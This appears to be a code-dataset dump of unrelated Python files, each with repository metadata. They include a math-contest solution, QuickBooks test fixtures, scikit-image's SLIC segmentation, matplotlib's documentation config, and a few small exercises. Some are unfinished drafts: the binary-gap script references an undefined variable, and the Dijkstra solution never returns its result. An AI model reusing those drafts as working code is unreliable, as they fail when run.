885c5a1be228ae7ba9f00b3d63521c9ff7d21608
refs/heads/master
2023-08-18T08:38:33.068168
2023-08-15T04:28:13
2023-08-15T04:28:13
183,425,786
0
0
MIT
2023-08-15T04:28:14
2019-04-25T12:02:53
Python
UTF-8
Python
false
false
476
py
import sys def gcd(a, b): """Euclidean Algorithm""" while b != 0: a, b = b, a % b return a def lcm(a, b): return (a * b) // gcd(a, b) def main(): input = sys.stdin.readline A, B, C, D = map(int, input().split()) E = lcm(C, D) total = B - (A-1) mul_c = B // C - (A-1) // C mul_d = B // D - (A-1) // D mul_e = B // E - (A-1) // E return total - (mul_c + mul_d - mul_e) if __name__ == '__main__': print(main())
889b22757513884a8c6c50f0b76bbe2c55a22845
b515ebbe9b259cf8cc11bae3eb2cd9094d9dac80
/tests/integration/test_base.py
09c270270007ae701dc6d64c0735eb0fe39714a5
[ "MIT", "Python-2.0" ]
permissive
cambiumproject/python-quickbooks
a234e29555e37399f53a9909cf4c3cf61e9e7bc1
06110a4a88bb47b2e6349a193908c083d506dde1
refs/heads/master
2023-08-07T20:15:14.600671
2021-07-20T21:53:59
2021-07-20T21:53:59
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,335
py
import os from unittest import TestCase from intuitlib.client import AuthClient from quickbooks.client import QuickBooks, Environments class QuickbooksTestCase(TestCase): def setUp(self): super(QuickbooksTestCase, self).setUp() self.auth_client = AuthClient( client_id=os.environ.get('CLIENT_ID'), client_secret=os.environ.get('CLIENT_SECRET'), environment=Environments.SANDBOX, redirect_uri='http://localhost:8000/callback', ) self.qb_client = QuickBooks( minorversion=59, auth_client=self.auth_client, refresh_token=os.environ.get('REFRESH_TOKEN'), company_id=os.environ.get('COMPANY_ID'), ) self.qb_client.sandbox = True class QuickbooksUnitTestCase(TestCase): def setUp(self): super(QuickbooksUnitTestCase, self).setUp() self.auth_client = AuthClient( client_id='CLIENTID', client_secret='CLIENT_SECRET', environment=Environments.SANDBOX, redirect_uri='http://localhost:8000/callback', ) self.qb_client = QuickBooks( #auth_client=self.auth_client, refresh_token='REFRESH_TOKEN', company_id='COMPANY_ID', ) self.qb_client.sandbox = True
843d5c4d45fddd036ed5fa1783b168dbde9b6640
52b5773617a1b972a905de4d692540d26ff74926
/.history/binary_20200524140021.py
cad576ae530c25621bd03b09d3d763a13dba320b
[]
no_license
MaryanneNjeri/pythonModules
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
f4e56b1e4dda2349267af634a46f6b9df6686020
refs/heads/master
2022-12-16T02:59:19.896129
2020-09-11T12:05:22
2020-09-11T12:05:22
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,207
py
def solution(N): print(N) maximumCount = 0 well = format(9,"b") print("wow",well) # while( N >= 1): # N = int(N / 2) # # print("this",N) # print("N",N/2,"well",N%2) # if N % 2 == 0 : # binaryNumber.append(0) # else: # binaryNumber.append(1) # then reverse the number s = [str(i) for i in well] binary = int("".join(s)) intialNumber = None lastNumber = None totalCount = 0 print("binary",str(binary)) print("number",number) for i in range(len(str(binary))): if number[i] == 1: intialNumber = 1 if i < len(number)-1: if number[i] == 0 and number[i+1] : lastNumber = 1 if intialNumber is not None and lastNumber is not None and number[i] == 0: maximumCount = maximumCount + 1 else: totalCount = maximumCount maximumCount = 0 # return 0 print("total",totalCount) solution(9)
efd20d62075642d05d33586f9a2f19037598aa02
ee41311a11a1c6baedafd9a914d5a1f8330fe8a9
/SANEF_LIVE/venv/Lib/site-packages/skimage/segmentation/slic_superpixels.py
b196dbffc726dfb4cbf2e1da2a6e255d3901f1ec
[]
no_license
sethnanati/CodeRepoPython
2dffb7263620bd905bf694f348485d894a9513db
b55e66611d19b35e9926d1b1387320cf48e177c8
refs/heads/master
2023-07-07T11:16:12.958401
2021-02-13T10:09:48
2021-02-13T10:09:48
376,531,283
0
0
null
null
null
null
UTF-8
Python
false
false
7,799
py
# coding=utf-8 from __future__ import division import collections as coll import numpy as np from scipy import ndimage as ndi from ..util import img_as_float, regular_grid from ..segmentation._slic import (_slic_cython, _enforce_label_connectivity_cython) from ..color import rgb2lab def slic(image, n_segments=100, compactness=10., max_iter=10, sigma=0, spacing=None, multichannel=True, convert2lab=None, enforce_connectivity=True, min_size_factor=0.5, max_size_factor=3, slic_zero=False): """Segments image using k-means clustering in Color-(x,y,z) space. Parameters ---------- image : 2D, 3D or 4D ndarray Input image, which can be 2D or 3D, and grayscale or multichannel (see `multichannel` parameter). n_segments : int, optional The (approximate) number of labels in the segmented output image. compactness : float, optional Balances color proximity and space proximity. Higher values give more weight to space proximity, making superpixel shapes more square/cubic. In SLICO mode, this is the initial compactness. This parameter depends strongly on image contrast and on the shapes of objects in the image. We recommend exploring possible values on a log scale, e.g., 0.01, 0.1, 1, 10, 100, before refining around a chosen value. max_iter : int, optional Maximum number of iterations of k-means. sigma : float or (3,) array-like of floats, optional Width of Gaussian smoothing kernel for pre-processing for each dimension of the image. The same sigma is applied to each dimension in case of a scalar value. Zero means no smoothing. Note, that `sigma` is automatically scaled if it is scalar and a manual voxel spacing is provided (see Notes section). spacing : (3,) array-like of floats, optional The voxel spacing along each image dimension. By default, `slic` assumes uniform spacing (same voxel resolution along z, y and x). This parameter controls the weights of the distances along z, y, and x during k-means clustering. multichannel : bool, optional Whether the last axis of the image is to be interpreted as multiple channels or another spatial dimension. convert2lab : bool, optional Whether the input should be converted to Lab colorspace prior to segmentation. The input image *must* be RGB. Highly recommended. This option defaults to ``True`` when ``multichannel=True`` *and* ``image.shape[-1] == 3``. enforce_connectivity: bool, optional Whether the generated segments are connected or not min_size_factor: float, optional Proportion of the minimum segment size to be removed with respect to the supposed segment size ```depth*width*height/n_segments``` max_size_factor: float, optional Proportion of the maximum connected segment size. A value of 3 works in most of the cases. slic_zero: bool, optional Run SLIC-zero, the zero-parameter mode of SLIC. [2]_ Returns ------- labels : 2D or 3D array Integer mask indicating segment labels. Raises ------ ValueError If ``convert2lab`` is set to ``True`` but the last array dimension is not of length 3. Notes ----- * If `sigma > 0`, the image is smoothed using a Gaussian kernel prior to segmentation. * If `sigma` is scalar and `spacing` is provided, the kernel width is divided along each dimension by the spacing. For example, if ``sigma=1`` and ``spacing=[5, 1, 1]``, the effective `sigma` is ``[0.2, 1, 1]``. This ensures sensible smoothing for anisotropic images. * The image is rescaled to be in [0, 1] prior to processing. * Images of shape (M, N, 3) are interpreted as 2D RGB images by default. To interpret them as 3D with the last dimension having length 3, use `multichannel=False`. References ---------- .. [1] Radhakrishna Achanta, Appu Shaji, Kevin Smith, Aurelien Lucchi, Pascal Fua, and Sabine Süsstrunk, SLIC Superpixels Compared to State-of-the-art Superpixel Methods, TPAMI, May 2012. .. [2] http://ivrg.epfl.ch/research/superpixels#SLICO Examples -------- >>> from skimage.segmentation import slic >>> from skimage.data import astronaut >>> img = astronaut() >>> segments = slic(img, n_segments=100, compactness=10) Increasing the compactness parameter yields more square regions: >>> segments = slic(img, n_segments=100, compactness=20) """ image = img_as_float(image) is_2d = False if image.ndim == 2: # 2D grayscale image image = image[np.newaxis, ..., np.newaxis] is_2d = True elif image.ndim == 3 and multichannel: # Make 2D multichannel image 3D with depth = 1 image = image[np.newaxis, ...] is_2d = True elif image.ndim == 3 and not multichannel: # Add channel as single last dimension image = image[..., np.newaxis] if spacing is None: spacing = np.ones(3) elif isinstance(spacing, (list, tuple)): spacing = np.array(spacing, dtype=np.double) if not isinstance(sigma, coll.Iterable): sigma = np.array([sigma, sigma, sigma], dtype=np.double) sigma /= spacing.astype(np.double) elif isinstance(sigma, (list, tuple)): sigma = np.array(sigma, dtype=np.double) if (sigma > 0).any(): # add zero smoothing for multichannel dimension sigma = list(sigma) + [0] image = ndi.gaussian_filter(image, sigma) if multichannel and (convert2lab or convert2lab is None): if image.shape[-1] != 3 and convert2lab: raise ValueError("Lab colorspace conversion requires a RGB image.") elif image.shape[-1] == 3: image = rgb2lab(image) depth, height, width = image.shape[:3] # initialize cluster centroids for desired number of segments grid_z, grid_y, grid_x = np.mgrid[:depth, :height, :width] slices = regular_grid(image.shape[:3], n_segments) step_z, step_y, step_x = [int(s.step if s.step is not None else 1) for s in slices] segments_z = grid_z[slices] segments_y = grid_y[slices] segments_x = grid_x[slices] segments_color = np.zeros(segments_z.shape + (image.shape[3],)) segments = np.concatenate([segments_z[..., np.newaxis], segments_y[..., np.newaxis], segments_x[..., np.newaxis], segments_color], axis=-1).reshape(-1, 3 + image.shape[3]) segments = np.ascontiguousarray(segments) # we do the scaling of ratio in the same way as in the SLIC paper # so the values have the same meaning step = float(max((step_z, step_y, step_x))) ratio = 1.0 / compactness image = np.ascontiguousarray(image * ratio) labels = _slic_cython(image, segments, step, max_iter, spacing, slic_zero) if enforce_connectivity: segment_size = depth * height * width / n_segments min_size = int(min_size_factor * segment_size) max_size = int(max_size_factor * segment_size) labels = _enforce_label_connectivity_cython(labels, min_size, max_size) if is_2d: labels = labels[0] return labels
24b01653afda42c4f298c4de77f67fe16d74d598
1d928c3f90d4a0a9a3919a804597aa0a4aab19a3
/python/matplotlib/2017/12/conf.py
c89c9d2c773a8efd08213dff9656b75f7cfde32b
[]
no_license
rosoareslv/SED99
d8b2ff5811e7f0ffc59be066a5a0349a92cbb845
a062c118f12b93172e31e8ca115ce3f871b64461
refs/heads/main
2023-02-22T21:59:02.703005
2021-01-28T19:40:51
2021-01-28T19:40:51
306,497,459
1
1
null
2020-11-24T20:56:18
2020-10-23T01:18:07
null
UTF-8
Python
false
false
18,382
py
# -*- coding: utf-8 -*- # # Matplotlib documentation build configuration file, created by # sphinx-quickstart on Fri May 2 12:33:25 2008. # # This file is execfile()d with the current directory set to its containing dir. # # The contents of this file are pickled, so don't put values in the namespace # that aren't pickleable (module imports are okay, they're removed automatically). # # All configuration values have a default value; values that are commented out # serve to show the default value. import matplotlib import os import sys import sphinx import six from glob import glob from sphinx_gallery.sorting import ExplicitOrder # If your extensions are in another directory, add it here. If the directory # is relative to the documentation root, use os.path.abspath to make it # absolute, like shown here. sys.path.append(os.path.abspath('.')) # General configuration # --------------------- # Add any Sphinx extension module names here, as strings. They can be extensions # coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['matplotlib.sphinxext.mathmpl', 'sphinxext.math_symbol_table', 'sphinx.ext.autodoc', 'matplotlib.sphinxext.only_directives', 'sphinx.ext.doctest', 'sphinx.ext.autosummary', 'sphinx.ext.inheritance_diagram', 'sphinx.ext.intersphinx', 'sphinx_gallery.gen_gallery', 'matplotlib.sphinxext.plot_directive', 'sphinxext.github', 'numpydoc'] exclude_patterns = ['api/api_changes/*', 'users/whats_new/*'] def _check_deps(): names = {"colorspacious": 'colorspacious', "IPython.sphinxext.ipython_console_highlighting": 'ipython', "matplotlib": 'matplotlib', "numpydoc": 'numpydoc', "PIL.Image": 'pillow', "sphinx_gallery": 'sphinx_gallery'} if sys.version_info < (3, 3): names["mock"] = 'mock' missing = [] for name in names: try: __import__(name) except ImportError: missing.append(names[name]) if missing: raise ImportError( "The following dependencies are missing to build the " "documentation: {}".format(", ".join(missing))) _check_deps() try: from unittest.mock import MagicMock except ImportError: from mock import MagicMock # Use IPython's console highlighting by default extensions.extend(['IPython.sphinxext.ipython_console_highlighting', 'IPython.sphinxext.ipython_directive']) if six.PY2: from distutils.spawn import find_executable has_dot = find_executable('dot') is not None else: from shutil import which # Python >= 3.3 has_dot = which('dot') is not None if not has_dot: raise OSError( "No binary named dot - you need to install the Graph Visualization " "software (usually packaged as 'graphviz') to build the documentation") autosummary_generate = True autodoc_docstring_signature = True autodoc_default_flags = ['members', 'undoc-members'] intersphinx_mapping = { 'python': ('https://docs.python.org/3', None), 'numpy': ('https://docs.scipy.org/doc/numpy/', None), 'scipy': ('https://docs.scipy.org/doc/scipy/reference/', None), 'pandas': ('https://pandas.pydata.org/pandas-docs/stable', None) } explicit_order_folders = [ '../examples/api', '../examples/pyplots', '../examples/subplots_axes_and_figures', '../examples/color', '../examples/statistics', '../examples/lines_bars_and_markers', '../examples/images_contours_and_fields', '../examples/shapes_and_collections', '../examples/text_labels_and_annotations', '../examples/pie_and_polar_charts', '../examples/style_sheets', '../examples/axes_grid', '../examples/showcase', '../tutorials/introductory', '../tutorials/intermediate', '../tutorials/advanced'] for folder in sorted(glob('../examples/*') + glob('../tutorials/*')): if not os.path.isdir(folder) or folder in explicit_order_folders: continue explicit_order_folders.append(folder) # Sphinx gallery configuration sphinx_gallery_conf = { 'examples_dirs': ['../examples', '../tutorials'], 'filename_pattern': '^((?!sgskip).)*$', 'gallery_dirs': ['gallery', 'tutorials'], 'doc_module': ('matplotlib', 'mpl_toolkits'), 'reference_url': { 'matplotlib': None, 'numpy': 'https://docs.scipy.org/doc/numpy', 'scipy': 'https://docs.scipy.org/doc/scipy/reference', }, 'backreferences_dir': 'api/_as_gen', 'subsection_order': ExplicitOrder(explicit_order_folders), 'min_reported_time': 1, } plot_gallery = 'True' # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # This is the default encoding, but it doesn't hurt to be explicit source_encoding = "utf-8" # The master toctree document. master_doc = 'contents' # General substitutions. project = 'Matplotlib' copyright = ('2002 - 2012 John Hunter, Darren Dale, Eric Firing, ' 'Michael Droettboom and the Matplotlib development ' 'team; 2012 - 2017 The Matplotlib development team') # The default replacements for |version| and |release|, also used in various # other places throughout the built documents. # # The short X.Y version. version = matplotlib.__version__ # The full version, including alpha/beta/rc tags. release = version # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. today_fmt = '%B %d, %Y' # List of documents that shouldn't be included in the build. unused_docs = [] # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' default_role = 'obj' # Plot directive configuration # ---------------------------- plot_formats = [('png', 100), ('pdf', 100)] # Github extension github_project_url = "https://github.com/matplotlib/matplotlib/" # Options for HTML output # ----------------------- # The style sheet to use for HTML and HTML Help pages. A file of that name # must exist either in Sphinx' static/ path, or in one of the custom paths # given in html_static_path. #html_style = 'matplotlib.css' html_style = 'mpl.css' # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # The name of an image file (within the static path) to place at the top of # the sidebar. #html_logo = 'logo.png' # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # If nonempty, this is the file name suffix for generated HTML files. The # default is ``".html"``. html_file_suffix = '.html' # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Content template for the index page. html_index = 'index.html' # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Custom sidebar templates, maps page names to templates. html_sidebars = { 'index': ['donate_sidebar.html', 'searchbox.html'], '**': ['localtoc.html', 'relations.html', 'sourcelink.html', 'searchbox.html'] } # If false, no module index is generated. #html_use_modindex = True html_domain_indices = ["py-modindex"] # If true, the reST sources are included in the HTML build as _sources/<name>. #html_copy_source = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. html_use_opensearch = 'False' # Output file base name for HTML help builder. htmlhelp_basename = 'Matplotlibdoc' # Path to favicon html_favicon = '_static/favicon.ico' # Options for LaTeX output # ------------------------ # The paper size ('letter' or 'a4'). latex_paper_size = 'letter' # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, document class [howto/manual]). latex_documents = [ ('contents', 'Matplotlib.tex', 'Matplotlib', 'John Hunter, Darren Dale, Eric Firing, Michael Droettboom and the ' 'matplotlib development team', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. latex_logo = None latex_elements = {} # Additional stuff for the LaTeX preamble. latex_elements['preamble'] = r""" % In the parameters section, place a newline after the Parameters % header. (This is stolen directly from Numpy's conf.py, since it % affects Numpy-style docstrings). \usepackage{expdlist} \let\latexdescription=\description \def\description{\latexdescription{}{} \breaklabel} \usepackage{amsmath} \usepackage{amsfonts} \usepackage{amssymb} \usepackage{txfonts} % The enumitem package provides unlimited nesting of lists and % enums. Sphinx may use this in the future, in which case this can % be removed. See % https://bitbucket.org/birkenfeld/sphinx/issue/777/latex-output-too-deeply-nested \usepackage{enumitem} \setlistdepth{2048} """ latex_elements['pointsize'] = '11pt' # Documents to append as an appendix to all manuals. latex_appendices = [] # If false, no module index is generated. latex_use_modindex = True if hasattr(sphinx, 'version_info') and sphinx.version_info[:2] >= (1, 4): latex_toplevel_sectioning = 'part' else: latex_use_parts = True # Show both class-level docstring and __init__ docstring in class # documentation autoclass_content = 'both' rst_epilog = """ .. |minimum_numpy_version| replace:: %s """ % matplotlib.__version__numpy__ texinfo_documents = [ ("contents", 'matplotlib', 'Matplotlib Documentation', 'John Hunter@*Darren Dale@*Eric Firing@*Michael Droettboom@*' 'The matplotlib development team', 'Matplotlib', "Python plotting package", 'Programming', 1), ] class MyWX(MagicMock): class Panel(object): pass class ToolBar(object): pass class Frame(object): pass VERSION_STRING = '2.9' class MyPyQt4(MagicMock): class QtGui(object): # PyQt4.QtGui public classes. # Generated with # textwrap.fill([name for name in dir(PyQt4.QtGui) # if isinstance(getattr(PyQt4.QtGui, name), type)]) _QtGui_public_classes = """\ Display QAbstractButton QAbstractGraphicsShapeItem QAbstractItemDelegate QAbstractItemView QAbstractPrintDialog QAbstractProxyModel QAbstractScrollArea QAbstractSlider QAbstractSpinBox QAbstractTextDocumentLayout QAction QActionEvent QActionGroup QApplication QBitmap QBoxLayout QBrush QButtonGroup QCalendarWidget QCheckBox QClipboard QCloseEvent QColor QColorDialog QColumnView QComboBox QCommandLinkButton QCommonStyle QCompleter QConicalGradient QContextMenuEvent QCursor QDataWidgetMapper QDateEdit QDateTimeEdit QDesktopServices QDesktopWidget QDial QDialog QDialogButtonBox QDirModel QDockWidget QDoubleSpinBox QDoubleValidator QDrag QDragEnterEvent QDragLeaveEvent QDragMoveEvent QDropEvent QErrorMessage QFileDialog QFileIconProvider QFileOpenEvent QFileSystemModel QFocusEvent QFocusFrame QFont QFontComboBox QFontDatabase QFontDialog QFontInfo QFontMetrics QFontMetricsF QFormLayout QFrame QGesture QGestureEvent QGestureRecognizer QGlyphRun QGradient QGraphicsAnchor QGraphicsAnchorLayout QGraphicsBlurEffect QGraphicsColorizeEffect QGraphicsDropShadowEffect QGraphicsEffect QGraphicsEllipseItem QGraphicsGridLayout QGraphicsItem QGraphicsItemAnimation QGraphicsItemGroup QGraphicsLayout QGraphicsLayoutItem QGraphicsLineItem QGraphicsLinearLayout QGraphicsObject QGraphicsOpacityEffect QGraphicsPathItem QGraphicsPixmapItem QGraphicsPolygonItem QGraphicsProxyWidget QGraphicsRectItem QGraphicsRotation QGraphicsScale QGraphicsScene QGraphicsSceneContextMenuEvent QGraphicsSceneDragDropEvent QGraphicsSceneEvent QGraphicsSceneHelpEvent QGraphicsSceneHoverEvent QGraphicsSceneMouseEvent QGraphicsSceneMoveEvent QGraphicsSceneResizeEvent QGraphicsSceneWheelEvent QGraphicsSimpleTextItem QGraphicsTextItem QGraphicsTransform QGraphicsView QGraphicsWidget QGridLayout QGroupBox QHBoxLayout QHeaderView QHelpEvent QHideEvent QHoverEvent QIcon QIconDragEvent QIconEngine QIconEngineV2 QIdentityProxyModel QImage QImageIOHandler QImageReader QImageWriter QInputContext QInputContextFactory QInputDialog QInputEvent QInputMethodEvent QIntValidator QItemDelegate QItemEditorCreatorBase QItemEditorFactory QItemSelection QItemSelectionModel QItemSelectionRange QKeyEvent QKeyEventTransition QKeySequence QLCDNumber QLabel QLayout QLayoutItem QLineEdit QLinearGradient QListView QListWidget QListWidgetItem QMainWindow QMatrix QMatrix2x2 QMatrix2x3 QMatrix2x4 QMatrix3x2 QMatrix3x3 QMatrix3x4 QMatrix4x2 QMatrix4x3 QMatrix4x4 QMdiArea QMdiSubWindow QMenu QMenuBar QMessageBox QMimeSource QMouseEvent QMouseEventTransition QMoveEvent QMovie QPageSetupDialog QPaintDevice QPaintEngine QPaintEngineState QPaintEvent QPainter QPainterPath QPainterPathStroker QPalette QPanGesture QPen QPicture QPictureIO QPinchGesture QPixmap QPixmapCache QPlainTextDocumentLayout QPlainTextEdit QPolygon QPolygonF QPrintDialog QPrintEngine QPrintPreviewDialog QPrintPreviewWidget QPrinter QPrinterInfo QProgressBar QProgressDialog QProxyModel QPushButton QPyTextObject QQuaternion QRadialGradient QRadioButton QRawFont QRegExpValidator QRegion QResizeEvent QRubberBand QScrollArea QScrollBar QSessionManager QShortcut QShortcutEvent QShowEvent QSizeGrip QSizePolicy QSlider QSortFilterProxyModel QSound QSpacerItem QSpinBox QSplashScreen QSplitter QSplitterHandle QStackedLayout QStackedWidget QStandardItem QStandardItemModel QStaticText QStatusBar QStatusTipEvent QStringListModel QStyle QStyleFactory QStyleHintReturn QStyleHintReturnMask QStyleHintReturnVariant QStyleOption QStyleOptionButton QStyleOptionComboBox QStyleOptionComplex QStyleOptionDockWidget QStyleOptionDockWidgetV2 QStyleOptionFocusRect QStyleOptionFrame QStyleOptionFrameV2 QStyleOptionFrameV3 QStyleOptionGraphicsItem QStyleOptionGroupBox QStyleOptionHeader QStyleOptionMenuItem QStyleOptionProgressBar QStyleOptionProgressBarV2 QStyleOptionRubberBand QStyleOptionSizeGrip QStyleOptionSlider QStyleOptionSpinBox QStyleOptionTab QStyleOptionTabBarBase QStyleOptionTabBarBaseV2 QStyleOptionTabV2 QStyleOptionTabV3 QStyleOptionTabWidgetFrame QStyleOptionTabWidgetFrameV2 QStyleOptionTitleBar QStyleOptionToolBar QStyleOptionToolBox QStyleOptionToolBoxV2 QStyleOptionToolButton QStyleOptionViewItem QStyleOptionViewItemV2 QStyleOptionViewItemV3 QStyleOptionViewItemV4 QStylePainter QStyledItemDelegate QSwipeGesture QSyntaxHighlighter QSystemTrayIcon QTabBar QTabWidget QTableView QTableWidget QTableWidgetItem QTableWidgetSelectionRange QTabletEvent QTapAndHoldGesture QTapGesture QTextBlock QTextBlockFormat QTextBlockGroup QTextBlockUserData QTextBrowser QTextCharFormat QTextCursor QTextDocument QTextDocumentFragment QTextDocumentWriter QTextEdit QTextFormat QTextFragment QTextFrame QTextFrameFormat QTextImageFormat QTextInlineObject QTextItem QTextLayout QTextLength QTextLine QTextList QTextListFormat QTextObject QTextObjectInterface QTextOption QTextTable QTextTableCell QTextTableCellFormat QTextTableFormat QTimeEdit QToolBar QToolBox QToolButton QToolTip QTouchEvent QTransform QTreeView QTreeWidget QTreeWidgetItem QTreeWidgetItemIterator QUndoCommand QUndoGroup QUndoStack QUndoView QVBoxLayout QValidator QVector2D QVector3D QVector4D QWhatsThis QWhatsThisClickedEvent QWheelEvent QWidget QWidgetAction QWidgetItem QWindowStateChangeEvent QWizard QWizardPage QWorkspace QX11EmbedContainer QX11EmbedWidget QX11Info """ for _name in _QtGui_public_classes.split(): locals()[_name] = type(_name, (), {}) del _name class MySip(MagicMock): def getapi(*args): return 1 mockwxversion = MagicMock() mockwx = MyWX() mocksip = MySip() mockpyqt4 = MyPyQt4() sys.modules['wxversion'] = mockwxversion sys.modules['wx'] = mockwx sys.modules['sip'] = mocksip sys.modules['PyQt4'] = mockpyqt4 # numpydoc config numpydoc_show_class_members = False # Skip deprecated members def skip_deprecated(app, what, name, obj, skip, options): if skip: return skip skipped = {"matplotlib.colors": ["ColorConverter", "hex2color", "rgb2hex"]} skip_list = skipped.get(getattr(obj, "__module__", None)) if skip_list is not None: return getattr(obj, "__name__", None) in skip_list def setup(app): app.connect('autodoc-skip-member', skip_deprecated)
0a20a0a7c7b6b3c688405d2ef7bcee0b30ed230f
ee3e0a69093e82deff1bddf607f6ce0dde372c48
/coding_test/카카오 인턴/num_4.py
226a287c788a6bf68f50fcecbe70e1a4d17bfa7e
[]
no_license
cndqjacndqja/algorithm_python
202f9990ea367629aecdd14304201eb6fa2aa37e
843269cdf8fb9d4c215c92a97fc2d007a8f96699
refs/heads/master
2023-06-24T08:12:29.639424
2021-07-24T05:08:46
2021-07-24T05:08:46
255,552,956
0
0
null
null
null
null
UTF-8
Python
false
false
647
py
from heapq import heappush, heappop INF = int(1e9) def solution(n, start, end, roads, traps): data = [[] for _ in range(n+1)] for i in roads: a, b, c = i data[a].append((b, c)) def dijkstra(start, end, n, data): distance = [INF for _ in range(n+1)] distance[start] = 0 q = [] heappush(q, (0, start)) while q: dis, node = heappop(q) if distance[node] < dis: continue for i in data[node]: cost = dis + i[1] if distance[i[0]] > cost: heappush(q, (cost, i[0])) distance[i[0]] = cost return distance[end]
4489ddbba60f18b2f96f68362668c0918617c6d0
e96cc817c768915eeff46027ded14e759e8042ff
/Python基础/字符串/判断.py
a08d4cb40f7a539f93ede6b04ae4724cf9c0e573
[]
no_license
fovegage/learn-python
e22a32207cf513ba0f8c3428e9c00138987c2359
93b8d3513769a0b7d492a7b515f289fe3f1efc4a
refs/heads/master
2023-06-08T13:44:57.274677
2023-05-29T05:52:35
2023-05-29T05:52:35
148,493,932
6
0
null
null
null
null
UTF-8
Python
false
false
1,187
py
# -*- coding: utf-8 -*- # @Time : 2018/12/27 14:45 # @Author : fovegage # @Email : [email protected] # @File : 判断.py # @Software: PyCharm # islower 仅对字母判断 str = 'hello' print(str.islower()) # isalnum() 判断是否由数字和字母组成 str = 'jjjssss22' print(str.isalnum()) # isalpha() 判断只有字母 26个字母以外均报错 str = 'sjsksk' print(str.isalpha()) # isdecimal() 若全部是十进制数返回true 否则false demo = '1234' print(demo.isdecimal()) # isidentifier() 是否是python标识符 由字母、数字、下划线组成 且不能以数字开头 str = '90' print(str.isidentifier()) # False # islower() 是否全部是小写 str = 'Tskksks' print(str.islower()) # False # isdigit() 是否全部是数字 num = '999' print(num.isdigit()) # isspace() 若是空格或制表符返回True 其他均false 注意 '' 和 ' '是不一样的 str = '\t' print(str.isspace()) # istitle() 判断是否是大写开头 str = 'dTg' print(str.istitle()) # 若全部是数字返回true isdigit()的加强版 支持'²3455' s = '\u00B23455' print(repr(s)) print(s.isnumeric())
de75179eb73337e3b223f1e9b50d70bc2438f591
b2d2ce1752ec5ea39b70ae37551bc162a748b469
/tests/unit/pypyraws/version_test.py
4ec7ddabcd59da582daa199da4ef6a25a4c6a7b9
[ "Apache-2.0" ]
permissive
AvdN/pypyr-aws
05c28abb904e2f71a0fbdaacaeaf20b458f97c52
96477b2deb46b6db73fa6d64f1350991dd378c31
refs/heads/master
2021-01-24T06:46:41.130069
2017-06-02T15:03:15
2017-06-02T15:03:15
93,318,585
0
0
null
2017-06-04T14:23:52
2017-06-04T14:23:52
null
UTF-8
Python
false
false
319
py
"""version.py unit tests.""" import pypyraws.version import platform def test_get_version(): actual = pypyraws.version.get_version() expected = (f'pypyraws {pypyraws.version.__version__} ' f'python {platform.python_version()}') assert actual == expected, "version not returning correctly"
da5e68cfc1a7005a1e829bc6a913fac6fd2f1f7d
1e263d605d4eaf0fd20f90dd2aa4174574e3ebce
/components/ally-http/ally/http/spec/server.py
6712ab685dee0fe68395d0005537a4483bf101b2
[]
no_license
galiminus/my_liveblog
698f67174753ff30f8c9590935d6562a79ad2cbf
550aa1d0a58fc30aa9faccbfd24c79a0ceb83352
refs/heads/master
2021-05-26T20:03:13.506295
2013-04-23T09:57:53
2013-04-23T09:57:53
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,564
py
''' Created on Jun 1, 2012 @package: ally http @copyright: 2012 Sourcefabric o.p.s. @license: http://www.gnu.org/licenses/gpl-3.0.txt @author: Gabriel Nistor Provides HTTP server specification. ''' from ally.design.context import Context, defines, requires, optional from ally.support.util_io import IInputStream from collections import Iterable import abc # -------------------------------------------------------------------- # HTTP methods. METHOD_GET = 'GET' METHOD_DELETE = 'DELETE' METHOD_POST = 'POST' METHOD_PUT = 'PUT' METHOD_OPTIONS = 'OPTIONS' METHOD_UNKNOWN = 'UNKNOWN' METHODS = frozenset((METHOD_GET, METHOD_DELETE, METHOD_POST, METHOD_PUT, METHOD_OPTIONS)) # -------------------------------------------------------------------- class RequestHTTP(Context): ''' Context for HTTP request data. ''' # ---------------------------------------------------------------- Defined scheme = defines(str, doc=''' @rtype: string The scheme URI protocol name to be used for the response. ''') methodName = defines(str, doc=''' @rtype: string The HTTP method name of the request. ''') uriRoot = defines(str, doc=''' @rtype: string The root URI to be considered for constructing a request path, basically the relative path root. ''') uri = defines(str, doc=''' @rtype: string The relative request URI. ''') parameters = defines(list, doc=''' @rtype: list[tuple(string, string)] The parameters of the request. ''') headers = defines(dict, doc=''' @rtype: dictionary{string, string} The raw headers. ''') class RequestContentHTTP(Context): ''' Context for HTTP request content data. ''' # ---------------------------------------------------------------- Defined source = defines(IInputStream, doc=''' @rtype: IInputStream The source for the request content. ''') class ResponseHTTP(Context): ''' Context for HTTP response data. ''' # ---------------------------------------------------------------- Required code = requires(int, doc=''' @rtype: integer The HTTP response code. ''') isSuccess = requires(bool, doc=''' @rtype: boolean True if the response is a success, False otherwise. ''') # ---------------------------------------------------------------- Optional text = optional(str, doc=''' @rtype: str The response text message (a short message). ''') headers = optional(dict, doc=''' @rtype: dictionary{String, string} The response headers. ''') class ResponseContentHTTP(Context): ''' Context for HTTP response content data. ''' # ---------------------------------------------------------------- Required source = requires(IInputStream, Iterable, doc=''' @rtype: IInputStream|Iterable The source for the response content. ''') # -------------------------------------------------------------------- class IDecoderHeader(metaclass=abc.ABCMeta): ''' Provides the header retrieve, parsing and decoding. ''' 